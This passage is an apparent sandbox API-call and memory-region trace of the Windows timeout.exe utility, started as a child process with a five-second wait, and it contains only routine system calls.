"pagefile_0x00000000006f0000" filename = "" Region: id = 3273 start_va = 0x7ffa080f0000 end_va = 0x7ffa08363fff monitored = 0 entry_point = 0x7ffa08160400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 3274 start_va = 0x1eb0000 end_va = 0x1eb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 3275 start_va = 0x1ec0000 end_va = 0x1ec1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Thread: id = 171 os_tid = 0xd24 Thread: id = 172 os_tid = 0xd20 Thread: id = 173 os_tid = 0xcdc Thread: id = 174 os_tid = 0xcd8 Process: id = "12" image_name = "timeout.exe" filename = "c:\\windows\\syswow64\\timeout.exe" page_root = "0x6d171000" os_pid = "0xcc8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xd30" cmd_line = "timeout /t 5 " cur_dir = "C:\\ProgramData\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3301 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3302 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3303 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3304 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3305 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3306 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3307 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 3308 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 3309 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3310 start_va = 0x990000 end_va = 0x999fff monitored = 1 entry_point = 0x994fb0 region_type = mapped_file name = "timeout.exe" filename = "\\Windows\\SysWOW64\\timeout.exe" (normalized: "c:\\windows\\syswow64\\timeout.exe") Region: id = 3311 start_va = 0x9a0000 end_va = 0x499ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 3312 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3313 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3314 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3315 start_va = 0x7fff0000 end_va = 0x7dfa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3316 start_va = 0x7dfa16770000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfa16770000" filename = "" Region: id = 3317 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3318 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 3331 start_va = 0x400000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3332 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3333 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3334 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3335 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3336 start_va = 0x5c0000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 3337 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3338 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3339 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3340 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3353 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3354 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3355 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3356 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3357 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3358 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 3359 start_va = 0x73f30000 end_va = 0x73f8efff monitored = 0 entry_point = 0x73f34af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3360 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3361 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3362 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3363 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3364 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3365 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3366 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3367 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3368 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3369 start_va = 0x6fa30000 end_va = 0x6fa37fff monitored = 0 entry_point = 0x6fa317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3370 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3371 start_va = 0x49a0000 end_va = 0x4b27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049a0000" filename = "" Region: id = 3372 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3373 start_va = 0x4b30000 end_va = 0x4cb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b30000" filename = "" Region: id = 3374 start_va = 0x4cc0000 end_va = 0x60bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cc0000" filename = "" Region: id = 3376 start_va = 0x30000 end_va = 0x32fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "timeout.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\timeout.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\timeout.exe.mui") Region: id = 3377 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3378 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3379 start_va = 0x480000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 3383 start_va = 0x60c0000 end_va = 0x63f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 177 os_tid = 0xcc0 [0186.629] GetModuleHandleA (lpModuleName=0x0) returned 0x990000 [0186.629] __set_app_type (_Type=0x1) [0186.629] __p__fmode () returned 0x76b44d6c [0186.629] __p__commode () returned 0x76b45b1c [0186.630] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x994fe0) returned 0x0 [0186.630] __wgetmainargs (in: _Argc=0x996018, _Argv=0x99601c, _Env=0x996020, _DoWildCard=0, _StartInfo=0x99602c | out: _Argc=0x996018, _Argv=0x99601c, _Env=0x996020) returned 0 [0186.630] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.641] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0186.641] SetLastError (dwErrCode=0x0) [0186.641] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0186.641] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0186.641] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0186.641] RtlVerifyVersionInfo (VersionInfo=0xdf7d8, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0186.641] GetProcessHeap () returned 0x720000 [0186.641] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x10) returned 0x727568 [0186.641] lstrlenW (lpString="") returned 0 [0186.641] GetProcessHeap () returned 0x720000 [0186.641] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x2) returned 0x726c38 [0186.641] GetProcessHeap () returned 0x720000 [0186.641] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x728818 [0186.641] GetProcessHeap () returned 0x720000 [0186.641] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x10) returned 0x727430 [0186.641] GetProcessHeap () returned 0x720000 [0186.641] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x727100 [0186.641] GetProcessHeap () returned 0x720000 [0186.642] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x727310 [0186.642] GetProcessHeap () returned 0x720000 [0186.642] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x7229a0 [0186.642] GetProcessHeap () returned 0x720000 [0186.642] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x723730 [0186.642] GetProcessHeap () returned 0x720000 [0186.642] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x10) returned 0x7273a0 [0186.642] GetProcessHeap () returned 0x720000 [0186.642] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x726ec8 [0186.642] GetProcessHeap () returned 0x720000 [0186.642] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x726ee8 [0186.642] GetProcessHeap () returned 0x720000 [0186.642] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x726f08 [0186.642] GetProcessHeap () returned 0x720000 [0186.642] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x727980 [0186.642] GetProcessHeap () returned 0x720000 [0186.642] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x10) returned 0x7273b8 [0186.642] GetProcessHeap () returned 0x720000 [0186.642] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c280 [0186.642] GetProcessHeap () returned 0x720000 [0186.642] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c1c0 [0186.642] GetProcessHeap () returned 0x720000 [0186.642] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c460 [0186.642] GetProcessHeap () returned 0x720000 [0186.642] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c160 [0186.642] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.683] SetLastError (dwErrCode=0x0) [0186.683] GetProcessHeap () returned 0x720000 [0186.683] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c4c0 [0186.683] GetProcessHeap () returned 0x720000 [0186.683] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c4e0 [0186.683] GetProcessHeap () returned 0x720000 [0186.683] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c320 [0186.683] GetProcessHeap () returned 0x720000 [0186.683] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c3a0 [0186.683] GetProcessHeap () returned 0x720000 [0186.683] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c440 [0186.683] GetProcessHeap () returned 0x720000 [0186.683] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x10) returned 0x7273d0 [0186.686] _memicmp (_Buf1=0x7273d0, _Buf2=0x9910ac, _Size=0x7) returned 0 [0186.686] GetProcessHeap () returned 0x720000 [0186.686] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x208) returned 0x72c500 [0186.686] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72c500, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\timeout.exe" (normalized: "c:\\windows\\syswow64\\timeout.exe")) returned 0x1f [0186.686] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\timeout.exe", lpdwHandle=0xdf8e4 | out: lpdwHandle=0xdf8e4) returned 0x76c [0186.686] GetProcessHeap () returned 0x720000 [0186.686] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x776) returned 0x72c710 [0186.686] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\timeout.exe", dwHandle=0x0, dwLen=0x776, lpData=0x72c710 | out: lpData=0x72c710) returned 1 [0186.686] VerQueryValueW (in: pBlock=0x72c710, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdf8ec, puLen=0xdf8f0 | out: lplpBuffer=0xdf8ec*=0x72cac0, puLen=0xdf8f0) returned 1 [0186.689] _memicmp (_Buf1=0x7273d0, _Buf2=0x9910ac, _Size=0x7) returned 0 [0186.689] _vsnwprintf (in: _Buffer=0x72c500, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdf8d0 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0186.690] VerQueryValueW (in: pBlock=0x72c710, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdf8fc, puLen=0xdf8f8 | out: lplpBuffer=0xdf8fc*=0x72c8f4, puLen=0xdf8f8) returned 1 [0186.690] lstrlenW (lpString="timeout.exe") returned 11 [0186.690] lstrlenW (lpString="timeout.exe") returned 11 [0186.690] lstrlenW (lpString=".EXE") returned 4 [0186.690] StrStrIW (lpFirst="timeout.exe", lpSrch=".EXE") returned=".exe" [0186.690] lstrlenW (lpString="timeout.exe") returned 11 [0186.690] lstrlenW (lpString=".EXE") returned 4 [0186.690] _memicmp (_Buf1=0x7273d0, _Buf2=0x9910ac, _Size=0x7) returned 0 [0186.690] lstrlenW (lpString="timeout") returned 7 [0186.691] GetProcessHeap () returned 0x720000 [0186.691] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c4a0 [0186.691] GetProcessHeap () returned 0x720000 [0186.691] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c480 [0186.691] GetProcessHeap () returned 0x720000 [0186.691] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c240 [0186.691] GetProcessHeap () returned 0x720000 [0186.691] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c1a0 [0186.691] GetProcessHeap () returned 0x720000 [0186.691] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x10) returned 0x72d2f0 [0186.691] _memicmp (_Buf1=0x72d2f0, _Buf2=0x9910ac, _Size=0x7) returned 0 [0186.691] GetProcessHeap () returned 0x720000 [0186.691] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0xa0) returned 0x72d540 [0186.692] GetProcessHeap () returned 0x720000 [0186.692] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c120 [0186.692] GetProcessHeap () returned 0x720000 [0186.692] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c3e0 [0186.692] GetProcessHeap () returned 0x720000 [0186.692] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c2e0 [0186.692] GetProcessHeap () returned 0x720000 [0186.692] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x10) returned 0x72d308 [0186.692] _memicmp (_Buf1=0x72d308, _Buf2=0x9910ac, _Size=0x7) returned 0 [0186.692] GetProcessHeap () returned 0x720000 [0186.692] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x200) returned 0x72e3d0 [0186.692] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x72e3d0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0186.693] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0186.693] GetProcessHeap () returned 0x720000 [0186.693] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x30) returned 0x728298 [0186.693] _vsnwprintf (in: _Buffer=0x72d540, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdf8d4 | out: _Buffer="Type \"TIMEOUT /?\" for usage.") returned 28 [0186.693] GetProcessHeap () returned 0x720000 [0186.693] GetProcessHeap () returned 0x720000 [0186.693] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c710) returned 1 [0186.693] GetProcessHeap () returned 0x720000 [0186.693] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c710) returned 0x776 [0186.694] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c710 | out: hHeap=0x720000) returned 1 [0186.694] SetLastError (dwErrCode=0x0) [0186.694] GetThreadLocale () returned 0x409 [0186.694] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0186.694] lstrlenW (lpString="?") returned 1 [0186.694] GetThreadLocale () returned 0x409 [0186.694] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0186.694] GetThreadLocale () returned 0x409 [0186.694] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0186.694] lstrlenW (lpString="nobreak") returned 7 [0186.694] SetLastError (dwErrCode=0x0) [0186.694] SetLastError (dwErrCode=0x0) [0186.694] lstrlenW (lpString="/t") returned 2 [0186.694] lstrlenW (lpString="-/") returned 2 [0186.694] StrChrIW (lpStart="-/", wMatch=0x54002f) returned="/" [0186.694] lstrlenW (lpString="?") returned 1 [0186.695] lstrlenW (lpString="?") returned 1 [0186.695] GetProcessHeap () returned 0x720000 [0186.695] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x10) returned 0x72d338 [0186.695] _memicmp (_Buf1=0x72d338, _Buf2=0x9910ac, _Size=0x7) returned 0 [0186.695] GetProcessHeap () returned 0x720000 [0186.695] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0xa) returned 0x72d380 [0186.695] lstrlenW (lpString="t") returned 1 [0186.695] GetProcessHeap () returned 0x720000 [0186.695] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x10) returned 0x72d320 [0186.695] _memicmp (_Buf1=0x72d320, _Buf2=0x9910ac, _Size=0x7) returned 0 [0186.695] GetProcessHeap () returned 0x720000 [0186.695] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0xa) returned 0x72d3b0 [0186.695] _vsnwprintf (in: _Buffer=0x72d380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|?|") returned 3 [0186.695] _vsnwprintf (in: _Buffer=0x72d3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|t|") returned 3 [0186.695] lstrlenW (lpString="|?|") returned 3 [0186.695] lstrlenW (lpString="|t|") returned 3 [0186.695] StrStrIW (lpFirst="|?|", lpSrch="|t|") returned 0x0 [0186.695] SetLastError (dwErrCode=0x490) [0186.695] lstrlenW (lpString="t") returned 1 [0186.695] lstrlenW (lpString="t") returned 1 [0186.695] _memicmp (_Buf1=0x72d338, _Buf2=0x9910ac, _Size=0x7) returned 0 [0186.695] lstrlenW (lpString="t") returned 1 [0186.696] _memicmp (_Buf1=0x72d320, _Buf2=0x9910ac, _Size=0x7) returned 0 [0186.696] _vsnwprintf (in: _Buffer=0x72d380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|t|") returned 3 [0186.696] _vsnwprintf (in: _Buffer=0x72d3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|t|") returned 3 [0186.696] lstrlenW (lpString="|t|") returned 3 [0186.696] lstrlenW (lpString="|t|") returned 3 [0186.696] StrStrIW (lpFirst="|t|", lpSrch="|t|") returned="|t|" [0186.696] SetLastError (dwErrCode=0x0) [0186.696] SetLastError (dwErrCode=0x0) [0186.696] lstrlenW (lpString="5") returned 1 [0186.696] SetLastError (dwErrCode=0x490) [0186.696] SetLastError (dwErrCode=0x0) [0186.696] lstrlenW (lpString="5") returned 1 [0186.696] StrChrIW (lpStart="5", wMatch=0x3a) returned 0x0 [0186.696] SetLastError (dwErrCode=0x490) [0186.696] SetLastError (dwErrCode=0x0) [0186.696] GetProcessHeap () returned 0x720000 [0186.696] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x10) returned 0x72d350 [0186.696] _memicmp (_Buf1=0x72d350, _Buf2=0x9910ac, _Size=0x7) returned 0 [0186.696] lstrlenW (lpString="5") returned 1 [0186.696] GetProcessHeap () returned 0x720000 [0186.696] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x4) returned 0x7279e8 [0186.696] lstrlenW (lpString="5") returned 1 [0186.696] lstrlenW (lpString=" \x09") returned 2 [0186.696] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0186.696] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0186.696] GetLastError () returned 0x0 [0186.696] lstrlenW (lpString="5") returned 1 [0186.696] lstrlenW (lpString="5") returned 1 [0186.696] SetLastError (dwErrCode=0x0) [0186.697] _errno () returned 0x5405b0 [0186.697] wcstol (in: _String="5", _EndPtr=0xdfab8, _Radix=10 | out: _EndPtr=0xdfab8*="") returned 5 [0186.697] lstrlenW (lpString="") returned 0 [0186.697] _errno () returned 0x5405b0 [0186.697] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x62eab141 [0186.697] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0186.697] GetFileType (hFile=0x38) returned 0x2 [0186.697] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xdfab0 | out: lpMode=0xdfab0) returned 1 [0186.735] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0186.735] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xdfad0 | out: lpMode=0xdfad0) returned 1 [0186.735] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a1) returned 1 [0186.736] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x38, lpNumberOfEvents=0xdfad4 | out: lpNumberOfEvents=0xdfad4) returned 1 [0186.737] FlushConsoleInputBuffer (hConsoleInput=0x38) returned 1 [0186.737] GetProcessHeap () returned 0x720000 [0186.737] RtlAllocateHeap (HeapHandle=0x720000, Flags=0xc, Size=0x14) returned 0x72c140 [0186.737] _memicmp (_Buf1=0x72d308, _Buf2=0x9910ac, _Size=0x7) returned 0 [0186.737] LoadStringW (in: hInstance=0x0, uID=0x98, lpBuffer=0x72e3d0, cchBufferMax=256 | out: lpBuffer="\nWaiting for %*lu") returned 0x11 [0186.737] lstrlenW 